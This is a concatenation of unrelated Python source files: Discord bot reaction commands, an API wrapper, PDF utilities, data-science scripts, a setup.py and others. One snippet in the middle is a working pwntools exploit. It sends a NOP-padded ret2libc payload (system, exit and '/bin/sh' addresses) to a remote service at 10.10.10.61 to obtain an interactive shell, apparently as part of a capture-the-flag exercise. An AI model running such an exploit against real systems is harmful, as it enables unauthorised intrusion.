msg = f"**{ctx.author.display_name}** is hugging **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***hugs*** Are you okay now, **{ctx.author.display_name}**?'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="hug", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="hug.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def slap(self, ctx):
"""What the hell did you just say to me? I'm gonna slap you to the moon for that comment!"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is slapping **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'**Uh, okay. Sure. _slaps_**'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="slap", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="slap.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def kiss(self, ctx):
"""Give that special someone a kiss! <3"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is kissing **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'I\'ll kiss you! *kisses*'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="kiss", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="kiss.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def pat(self, ctx):
"""Send a pat over to a person or a few people. Sometimes a pat speaks words that words cannot.
Or maybe I just really like pats so I endorse them. Whichever one it is."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is patting **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'***pats you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="pat", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="pat.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def poke(self, ctx):
"""Do you ever have a friend who just wont stop ignoring you? Just poke them. :eyes:"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is poking **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'*pokes you* hi. *pokes more*'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="poke", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="poke.gif"))
@commands.command(aliases=["teehee"], usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def tease(self, ctx):
"""Hehe. The command for when you want to be a little joker and tease someone."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is teasing **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
if ctx.author in ctx.message.mentions:
msg = f'*teases you* hehe'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="teehee", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="tease.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def stare(self, ctx):
"""The command for when you have no clue what to say to someone, so you just stare..."""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is staring at **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**..."
if ctx.author in ctx.message.mentions:
msg = f'***stares at you***'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="stare", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="stare.gif"))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def wakeup(self, ctx):
"""A way to get your friends off of their lazy butts and wake up."""
imgs = ["./images/wakeupa.gif", "./images/wakeupb.gif", "./images/wakeupc.gif", "./images/wakeupd.gif", "./images/wakeupe.gif", "./images/wakeupf.gif", "./images/wakeupg.gif", "./images/wakeuph.gif"]
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is telling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}** to wake up!"
if ctx.author in ctx.message.mentions:
msg = 'Uh, don\'t you need to be awake to send a message? Oh well. Wake up!'
await ctx.send(content=msg, file=discord.File(random.choice(imgs)))
@commands.command(usage="<members>")
@commands.bot_has_permissions(attach_files=True)
async def sleep(self, ctx):
"""The literal opposite of wakeup. This is also based off of my best friend, Kitty#4867, who would always tell me to go to bed. Love ya, Kat! ~Desii"""
if len(ctx.message.mentions) == 0:
await ctx.send(resolve_emoji('ERROR', ctx) + " You must mention at least one user.")
return
msg = f"**{ctx.author.display_name}** is telling **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}** to sleep!"
if ctx.author in ctx.message.mentions:
msg = f'**Self-discipline! I like it! Go sleep!**'
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="sleepy", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="sleep.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def cry(self, ctx):
"""When life gets at you and you just wanna let it all out."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is crying!'
else:
msg = f"**{ctx.author.display_name}** is crying because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="cry", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="cry.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def triggered(self, ctx):
"""**T R I G G E R E D**"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is triggered! REEEEEEEEEEEEEE'
else:
msg = f"**{ctx.author.display_name}** is triggered because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="triggered", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="triggered.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def think(self, ctx):
"""You ever think about stuff, man?"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is thinking...'
else:
msg = f"**{ctx.author.display_name}** is thinking about **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**! o.o"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="thinking", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="thinking.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def blush(self, ctx):
"""I-it's not like I like you, b-baka!"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is blushing... Who made them blush?'
else:
msg = f"**{ctx.author.display_name}** is blushing because of **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**! o.o"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="blush", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="blush.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def smile(self, ctx):
"""\uD83C\uDFB6 You make me smile like the sun, fall outta bed... \uD83C\uDFB6
What? I wasn't singing!"""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is smiling.'
else:
msg = f"**{ctx.author.display_name}** is smiling at**{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="smile", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="smile.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def shrug(self, ctx):
"""When you have no idea what is going on."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'***shrugs***'
else:
msg = f"**{ctx.author.display_name}** is shrugging at **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="shrug", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="hug.gif"))
@commands.command(usage="[members]")
@commands.bot_has_permissions(attach_files=True)
async def confused(self, ctx):
"""When you still have no idea what is going on."""
if len(ctx.message.mentions) == 0 or ctx.author in ctx.message.mentions:
msg = f'**{ctx.author.display_name}** is confused'
else:
msg = f"**{ctx.author.display_name}** is confused with **{(', '.join([m.display_name for m in ctx.message.mentions])).replace(', '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name, ' and '+ctx.message.mentions[len(ctx.message.mentions)-1].display_name)}**!"
img = await self.bot.session.get(url=(await self.bot.weeb.get_image(imgtype="clagwimoth", filetype="gif"))[0])
await ctx.send(content=msg, file=discord.File(await img.read(), filename="hug.gif"))
@commands.command()
async def kill(self, ctx, *, member: discord.Member):
"""Kill a user!
Note this command is just for fun. Nobody died in the making of this command... well maybe. *runs*"""
with open('killquotes.txt') as f:
quotes = f.readlines()
if ctx.author.id == member.id:
return await ctx.send(resolve_emoji('ERROR', ctx) + " Don't kill yourself! You're loved!")
if member.id == ctx.me.id:
return await ctx.send(resolve_emoji('ERROR', ctx) + " Nice try. <3")
await ctx.send(":knife: " + random.choice(quotes).format(member.display_name, ctx.author.display_name))
def setup(bot):
bot.add_cog(Action(bot))
|
"""Contains transformer configuration information
"""
# The version number of the transformer
TRANSFORMER_VERSION = '3.0'
# The transformer description
TRANSFORMER_DESCRIPTION = 'Hyperspectral to netCDF'
# Short name of the transformer
TRANSFORMER_NAME = 'terra.hyperspectral.raw2nc'
# The sensor associated with the transformer
TRANSFORMER_SENSOR = 'VNIR'
# The transformer type (eg: 'rgbmask', 'plotclipper')
TRANSFORMER_TYPE = 'hyperspectral'
# The name of the author of the extractor
AUTHOR_NAME = 'Charlie Zender'
# The email of the author of the extractor
AUTHOR_EMAIL = ''
# Contributors to this transformer
CONTRIBUTORS = []
# Repository URI of where the source code lives
REPOSITORY = 'https://github.com/AgPipeline/transformer-hyperspectral'
|
# -*- coding: utf-8 -*-
"""Interfaces to all of the People objects offered by the Trakt.tv API"""
from trakt.core import get
from trakt.sync import search
from trakt.utils import extract_ids, slugify
__author__ = 'Jon Nappi'
__all__ = ['Person', 'ActingCredit', 'CrewCredit', 'Credits', 'MovieCredits',
'TVCredits']
class Person(object):
"""A Class representing a trakt.tv Person such as an Actor or Director"""
def __init__(self, name, slug=None, **kwargs):
super(Person, self).__init__()
self.name = name
self.biography = self.birthplace = self.tmdb_id = self.birthday = None
self.job = self.character = self._images = self._movie_credits = None
self._tv_credits = None
self.slug = slug or slugify(self.name)
if len(kwargs) > 0:
self._build(kwargs)
else:
self._get()
@classmethod
def search(cls, name, year=None):
"""Perform a search for an episode with a title matching *title*
:param name: The name of the person to search for
:param year: Optional year to limit results to
"""
return search(name, search_type='person', year=year)
@property
def ext(self):
return 'people/{id}'.format(id=self.slug)
@property
def ext_full(self):
return self.ext + '?extended=full'
@property
def images_ext(self):
return self.ext + '?extended=images'
@property
def ext_movie_credits(self):
return self.ext + '/movies'
@property
def ext_tv_credits(self):
return self.ext + '/shows'
@get
def _get(self):
data = yield self.ext_full
self._build(data)
def _build(self, data):
extract_ids(data)
for key, val in data.items():
try:
setattr(self, key, val)
except AttributeError as ae:
if not hasattr(self, '_' + key):
raise ae
@property
def ids(self):
"""Accessor to the trakt, imdb, and tmdb ids, as well as the trakt.tv
slug
"""
return {'ids': {'trakt': self.trakt, 'slug': self.slug,
'imdb': self.imdb, 'tmdb': self.tmdb}}
@property
@get
def images(self):
"""All of the artwork associated with this :class:`Person`"""
if self._images is None:
data = yield self.images_ext
self._images = data.get('images', {})
yield self._images
@property
@get
def movie_credits(self):
"""Return a collection of movie credits that this :class:`Person` was a
cast or crew member on
"""
if self._movie_credits is None:
data = yield self.ext_movie_credits
self._movie_credits = MovieCredits(**data)
yield self._movie_credits
@property
@get
def tv_credits(self):
"""Return a collection of TV Show credits that this :class:`Person` was
a cast or crew member on
"""
if self._tv_credits is None:
data = yield self.ext_tv_credits
self._tv_credits = TVCredits(**data)
yield self._tv_credits
def __str__(self):
"""String representation of a :class:`Person`"""
return '<Person>: {0}'.format(self.name)
__repr__ = __str__
class ActingCredit(object):
"""An individual credit for a :class:`Person` who played a character in a
Movie or TV Show
"""
def __init__(self, character, media):
self.character = character
self.media = media
def __str__(self):
return '<{cls}> {character} - {title}'.format(
cls=self.__class__.__name__,
character=self.character,
title=self.media.title
)
__repr__ = __str__
class CrewCredit(object):
"""An individual crew credit for a :class:`Person` who had an off-screen
job on a Movie or a TV Show
"""
def __init__(self, job, media):
self.job = job
self.media = media
def __str__(self):
return '<{cls}> {job} - {title}'.format(
cls=self.__class__.__name__,
job=self.job,
title=self.media.title
)
__repr__ = __str__
class Credits(object):
"""A base type representing a :class:`Person`'s credits for Movies or TV
Shows
"""
MEDIA_KEY = None
def __init__(self, **kwargs):
self.cast = []
self.crew = {}
self._build(**kwargs)
def _extract_media(self, media):
"""Extract the nested media object from an individual Credit resource.
The *MEDIA_KEY* class attribute must be set by all implementing
subclasses.
"""
raise NotImplementedError
def _build_cast(self, *cast):
"""From the provided JSON array of roles a :class:`Person` has
portrayed, build a detailed list of Acting Credits.
"""
for role in cast:
character = role.get('character')
media = self._extract_media(role)
self.cast.append(
ActingCredit(character=character, media=media)
)
def _build_crew(self, **crew):
"""From the provided JSON dict of departments and crew credits, build
a dict of Crew Credits
"""
for department, jobs in crew.items():
self.crew[department] = [
CrewCredit(job=j.get('job'),
media=self._extract_media(j))
for j in jobs
]
def _build(self, **kwargs):
self._build_cast(*kwargs.get('cast', []))
self._build_crew(**kwargs.get('crew', {}))
class MovieCredits(Credits):
"""A collection of cast and crew credits for a Movie"""
MEDIA_KEY = 'movie'
def _extract_media(self, media):
from trakt.movies import Movie
data = media.get(self.MEDIA_KEY)
return Movie(**data)
class TVCredits(Credits):
"""A collection of cast and crew credits for a TV Show"""
MEDIA_KEY = 'show'
def _extract_media(self, media):
from trakt.tv import TVShow
data = media.get(self.MEDIA_KEY)
return TVShow(**data)
|
import math
def main():
"""
This main function will get a height from the user input
and draw a christmas tree with * , `\\` and `/`
:return: This function returns a christmas tree drawn
"""
height = int(input("Please Enter a height: "))
if(height % 2 == 0):
print("Your input should be an odd number.")
else:
# half way through the base line
print(" " * int(height/2) + "*")
# next line is the for loop for after the * up to the one before
# the last line
for h in range(int(height/2)-1): # 0 1 2 3 for the entry of 9
# these are for / s
# 3 2 1 0 spaces for the entry of 9
for _ in range(h * -1 + int(height/2)-1):
print(" ", end="")
print("/", end="")
# the end \ s are printed with this
for i in range(h*2 + 1):
print(" ", end="")
print("\\")
# for the base of the tree
print("/", end="")
print((height-2) * "_", end="")
print("\\")
main()
|
# coding: utf-8
from pwn import *
# uname -a
context(os="Linux", arch="x86_64")
HOST, PORT= "10.10.10.61", 32812
r = remote(HOST, PORT)
# Padding out the buffer with NOPs
ESP_START = 0xffffcff8
EIP = 0xffffd0cc
PAD = "\x90" * (EIP - ESP_START)
SYSTEM = 0xf7e4c060
EXIT = 0xf7e3faf0
SH = 0xf7e1f65e
RET = p32(SYSTEM)
RET += p32(EXIT)
RET += p32(SH)
PAYLOAD = PAD + RET
r.recvuntil("Enter Bridge Access Code:")
r.sendline("picarda1")
r.recvuntil("Waiting for input:")
r.sendline("4")
r.recvuntil("Enter Security Override:")
r.sendline(PAYLOAD)
r.interactive()
|
import PyPDF2
import os
#https://realpython.com/pdf-python/
def extract_information(pdf_path: str):
if not os.path.exists(pdf_path):
raise Exception(f"{pdf_path} doesn't exist")
with open(pdf_path , 'rb') as pdf_file:
pdf = PyPDF2.PdfFileReader(pdf_file)
information = pdf.getDocumentInfo()
number_of_pages = pdf.getNumPages()
txt = f"""
Information about {pdf_path}
Author: {information.author}.
Creator: {information.creator}.
Producer: {information.producer}.
Subject: {information.subject}.
Title: {information.title}.
Number of pages: {number_of_pages}.
"""
print(txt)
return information
def rotate_page(pdf_path):
pdf_reader = PyPDF2.PdfFileReader(pdf_path)
pdf_writer = PyPDF2.PdfFileWriter()
for page_number in range(pdf_reader.getNumPages()):
page = pdf_reader.getPage(page_number).rotateClockwise(90)
pdf_writer.addPage( page )
output_path = os.path.join('.','output.pdf')
with open(output_path , 'wb') as out_file:
pdf_writer.write(out_file)
def merge_pdfs(paths , output_path):
pdf_writer = PyPDF2.PdfFileWriter()
for path in paths:
if os.path.exists(path):
pdf_reader = PyPDF2.PdfFileReader(path)
# for page_number in range(pdf_reader.getNumPages()):
# page = pdf_reader.getPage(page_number)
# pdf_writer.addPage(page) # Add each page to the writer object
pdf_writer.appendPagesFromReader(pdf_reader) # you can also use buil in function
# Write out the merged PDF
with open(output_path , 'wb') as out_file:
pdf_writer.write(out_file)
def merge_pdfs_v2(pdfs , output):
pdf_merger = PyPDF2.PdfFileMerger()
for pdf in pdfs:
if os.path.exists(pdf):
pdf_merger.append(pdf)
with open(output , 'wb') as out_file:
pdf_merger.write(out_file)
def read_pdf(path):
pdf_reader = PyPDF2.PdfFileReader(path)
for page in pdf_reader.pages:
print(page.extractText()) # extracting text from page
pdf_reader.close()
if __name__ == '__main__':
pdf_path = '../Desktop/python-crash-course.pdf'
pdf_paths = []
output_path = os.path.join('.' , 'output.pdf')
# extract_information(pdf_path)
#
# rotate_page(pdf_path)
#
# for root , dirs , files in os.walk('C:/Users/Hussein Sarea/Desktop/Course c++'):
# for file in files:
# pdf_paths.append(os.path.join(root , file))
#
# merge_pdfs(pdf_paths , output_path)
# read_pdf(pdf_path)
for root , dirs , files in os.walk('C:/Users/Hussein Sarea/Desktop/Course c++'):
for file in files:
pdf_paths.append(os.path.join(root , file))
merge_pdfs_v2(pdf_paths , output_path)
|
import g2p.mappings.langs as g2p_langs
from networkx import has_path
def getLangs():
# LANGS_AVAILABLE in g2p lists langs inferred by the directory structure of
# g2p/mappings/langs, but in ReadAlongs, we need all input languages to any mappings.
# E.g., for Michif, we need to allow crg-dv and crg-tmd, but not crg, which is what
# LANGS_AVAILABLE contains. So we define our own list of languages here.
LANGS_AVAILABLE = []
# Set up LANG_NAMES hash table for studio UI to
# properly name the dropdown options
LANG_NAMES = {"eng": "English"}
for k, v in g2p_langs.LANGS.items():
for mapping in v["mappings"]:
# add mapping to names hash table
LANG_NAMES[mapping["in_lang"]] = mapping["language_name"]
# add input id to all available langs list
if mapping["in_lang"] not in LANGS_AVAILABLE:
LANGS_AVAILABLE.append(mapping["in_lang"])
# get the key from all networks in g2p module that have a path to 'eng-arpabet',
# which is needed for the readalongs
# Filter out <lang>-ipa: we only want "normal" input languages.
# Filter out *-norm and crk-no-symbols, these are just intermediate representations.
LANGS = [
x
for x in LANGS_AVAILABLE
if not x.endswith("-ipa")
and not x.endswith("-equiv")
and not x.endswith("-no-symbols")
and g2p_langs.LANGS_NETWORK.has_node(x)
and has_path(g2p_langs.LANGS_NETWORK, x, "eng-arpabet")
]
# Hack to allow old English LexiconG2P
LANGS += ["eng"]
# Sort LANGS so the -h messages list them alphabetically
LANGS = sorted(LANGS)
return LANGS
def parse_g2p_fallback(g2p_fallback_arg):
"""Parse the strings containing a colon-separated list of fallback args into a
Python list of language codes, or empty if None
"""
if g2p_fallback_arg:
g2p_fallbacks = g2p_fallback_arg.split(":")
for lang in g2p_fallbacks:
if lang not in LANGS:
raise click.BadParameter(
f'g2p fallback lang "{lang}" is not valid; choose among {", ".join(LANGS)}'
)
return g2p_fallbacks
else:
return []
|
import glob, os
from setuptools import setup, find_packages
setup(
name = 'metapub',
version = '0.4.3.5',
description = 'Pubmed / NCBI / eutils interaction library, handling the metadata of pubmed papers.',
url = 'https://bitbucket.org/metapub/metapub',
author = 'Naomi Most',
maintainer = 'Naomi Most',
author_email = 'naomi@nthmost.com',
maintainer_email = 'naomi@nthmost.com',
license = 'Apache 2.0',
packages = find_packages(),
install_requires = [
'setuptools',
'lxml',
'requests',
'eutils',
'tabulate',
'cssselect',
'unidecode',
'six',
'tox',
],
)
|
#!/usr/bin/env python3
#/home/mat/anaconda3/envs/qiime2-2019.10/bin python3
#/home/mat/anaconda3/envs/qiime2-2019.10/bin Python3
"""
Foundation of a visualization pipeline using Qiime2 artifact API and
Holoviz tools for interactive data comparison
"""
# Built-in/Generic Imports
import os
import sys
import argparse
# Libs
import csv
import re
import unittest
import zipfile
from pathlib import Path
import glob
import argparse
import fnmatch
# Import Holoviz libraries
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import numpy as np
import hvplot.pandas
import datashader as ds
import dask
import bokeh
import holoviews as hv
import panel as pn
from distutils.version import LooseVersion
from qiime2 import Artifact
from qiime2 import Visualization
from qiime2.plugins import feature_table
import biom
# min_versions = dict(pd='0.24.0', ds='0.7.0', dask='1.2.0', bokeh='1.2.0',
# hv='1.12.3')
__author__ = 'Mathew Richards'
__copyright__ = 'Copyright 2020, AAFC-AAC'
__credits__ = ['Mathew Richards', 'Rodrigo Ortega Polo']
__license__ = 'MIT'
__maintainer__ = 'Mathew Richards'
__email__ = 'mathew.richards@canada.ca'
__status__ = 'Draft'
print("\n", "****Visualization Tools****", "\n")
def setup():
"""Get the directory path from command line arg"""
# argparse section for command line arguments
parser = argparse.ArgumentParser(description='Visualization stuff')
parser.add_argument('directory',
help='The directory path where '
'your qiime2 files are located')
args = parser.parse_args()
try:
dir_name = args.directory
print("The entered directory is:", dir_name, "\n")
except OSError:
print('ERROR: Enter path to data in command line argument')
return dir_name
def main():
dir_name = setup()
print('\n', 'Start of main', '\n')
p = Path('extract_dir')
p.mkdir(exist_ok=True)
demux = dir_name + '/demux.qzv'
print(demux)
data_zip = zipfile.ZipFile(demux, 'r')
data_zip.extractall(path='extract_dir')
# potential to add a RegEx condition to create extract_dir based
# on input files or directory
for file in glob.iglob('extract_dir/*/data/per-*.csv'):
print(file)
data = pd.read_csv(file)
data.head()
fig = px.bar(data, x = 'Sample name', y = 'Sequence count', title = 'test graph')
# HIDE FOR NOW fig.show()
fig1 = go.Figure(go.Scatter(x = data['Sample name'], y = data['Sequence count'],
name ='test graph object'))
fig1.update_layout(title='Demux data', plot_bgcolor='rgb(230,200,170)',
showlegend=True)
# HIDE FOR NOW fig1.show()
print(type(data)) #produces <class 'pandas.core.frame.DataFrame'>
df_widget = pn.widgets.DataFrame(data, name='DataFrame')
df_widget.show()
###PANEL MODULE
def select_row(row=0):
return data.loc[row]
slide = pn.interact(select_row, row=(0, len(data)-1))
# THIS STOPS EXECUTION --> slide.show()
# slide1 = pn.interact(select_row, row=(0, 25))
# slide1.show()
#slide.servable() # FOR USE WITH 'panel serve' command on notebook file .ipynb
# this above call should also work for .py files
tutorial(dir_name)
# data_zip.close()
def tutorial(dir_name):
print('\n', 'Running the Artifact API tutorial section', '\n')
table = dir_name + '/table.qza'
unrarefied_table = Artifact.load(table)
rarefy_result = feature_table.methods.rarefy(table=unrarefied_table, sampling_depth=100)
rarefied_table = rarefy_result.rarefied_table
biom_table = rarefied_table.view(biom.Table)
print(biom_table.head())
if __name__ == '__main__':
main()
"""
ROADMAP
import holoviz and re-create existing graphs from qiime2 analysis
multiple plots at once!!
filters and categories!!
how to automate the import of their data??
output those in the proper bokeh server?
create a conda env with the req. packages for this
python-snappy, fastparquet, pyarrow, bokeh, etc.
add interactivity and other plots in future
transcriptomics, proteomics, metabolomics, etc.
EXTRA - keep for now
# data = data.set_index('Sample name')
# with gzip.open(demux, 'rb'):
# get into random directory beneath the qzv then to data
# for root, dirs, files in os.walk(dir_name):
# isDirectory = os.path.isdir(fpath)
# file = open('*/data/per-sample-fastq-counts.csv'
# file = Visualization.load(demux)
# doesn't seem like many options for this method
# file.hvplot()
# hvplot
"""
|
import requests
from tqdm import tqdm
## full url for downloading.
url = 'https://tenet.dl.sourceforge.net/project/keepass/KeePass%202.x/2.46/KeePass-2.46-Setup.exe'
def download(url, filename):
response = requests.get(url, stream=True)
with tqdm.wrapattr(open(filename, "wb"), "write",
miniters=1, desc=url.split('/')[-1],
total=int(response.headers.get('content-length', 0))) as fout:
for chunk in response.iter_content(chunk_size=4096):
fout.write(chunk)
## please put the full name of the file including the .exe or .zip or .bin
download(url,'KeePass-2.46-Setup.exe')
|
import ref
import cv2
import torch
import numpy as np
from utils.img import Crop, DrawGaussian, Transform3D
c = np.ones(2) * ref.h36mImgSize / 2
s = ref.h36mImgSize * 1.0
img = cv2.imread('../data/h36m/s_01_act_02_subact_01_ca_03/s_01_act_02_subact_01_ca_03_000111.jpg')
img = Crop(img, c, s, 0, ref.inputRes) / 256.
img.shape
img = torch.from_numpy(img).unsqueeze(0).cuda()
out3d = img[:,:,None,:,:].expand(1,3,32,256,256).cuda()
model3d = torch.load('inflatedModel.pth').cuda()
out2d = img.expand(32,3,256,256).cuda()
import pickle
from functools import partial
pickle.Unpickler = partial(pickle.Unpickler, encoding="latin1")
pickle.load = partial(pickle.load, encoding="latin1")
model = torch.load('models/hgreg-3d.pth').cuda()
out2d = model.conv1_(out2d)
out2d = model.bn1(out2d)
out2d = model.relu(out2d)
out2d = model.r1(out2d)
out2d = model.maxpool(out2d)
out2d = model.r4(out2d)
out2d = model.r5(out2d)
out2d = model.hourglass[0](out2d)
out = out2d.t().reshape(1,128,32,64,64)
out1 = model3d.hg.Residual[0](out)
print(out1[0,:,0,:,:])
print("Residual model3d")
out1 = model3d.hg.lin1[0](out1)
print(out1[0,:,0,:,:])
print("lin1 model3d")
out2 = model3d.hg.chantojoints[0](out1)
print(out2[0,:,0,:,:])
print("lin1 model3d")
out1 = model3d.hg.lin2[0](out1)
print(out1[0,:,0,:,:])
print("lin2 model3d")
out = out + out1 + model3d.hg.jointstochan[0](out2)
print(out[0,:,0,:,:])
print("lin1 model3d")
|
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
#import requests
from io import BytesIO
from PIL import Image
from maskrcnn_benchmark.config import cfg
from predictor import COCODemo
import numpy as np
from coco import COCO
import os
import cv2
import json
def load(url):
"""
Given an url of an image, downloads the image and
returns a PIL image
"""
response = requests.get(url)
pil_image = Image.open(BytesIO(response.content)).convert("RGB")
# convert to BGR format
image = np.array(pil_image)[:, :, [2, 1, 0]]
return image
def imshow(img):
plt.imshow(img[:, :, [2, 1, 0]])
plt.axis("off")
if __name__ == "__main__":
# this makes our figures bigger
pylab.rcParams['figure.figsize'] = 20, 12
config_file = "../configs/predict.yaml"
iou_threshold = 0.1
# update the config options with the config file
cfg.merge_from_file(config_file)
# manual override some options
cfg.merge_from_list(["MODEL.DEVICE", "cpu"])
coco_demo = COCODemo(
cfg,
min_image_size=800,
confidence_threshold=0.85,
)
testPath = "../datasets/val"
coco=COCO("../datasets/annotations/val.json")
summaryIoU = [[],[],[],[],[]]
summaryF1 = [[],[],[],[],[]]
summaryP = [[],[],[],[],[]]
summaryR = [[],[],[],[],[]]
allBG_F1 = [[],[],[],[],[]]
pixel_acc_list = [[],[],[],[],[]]
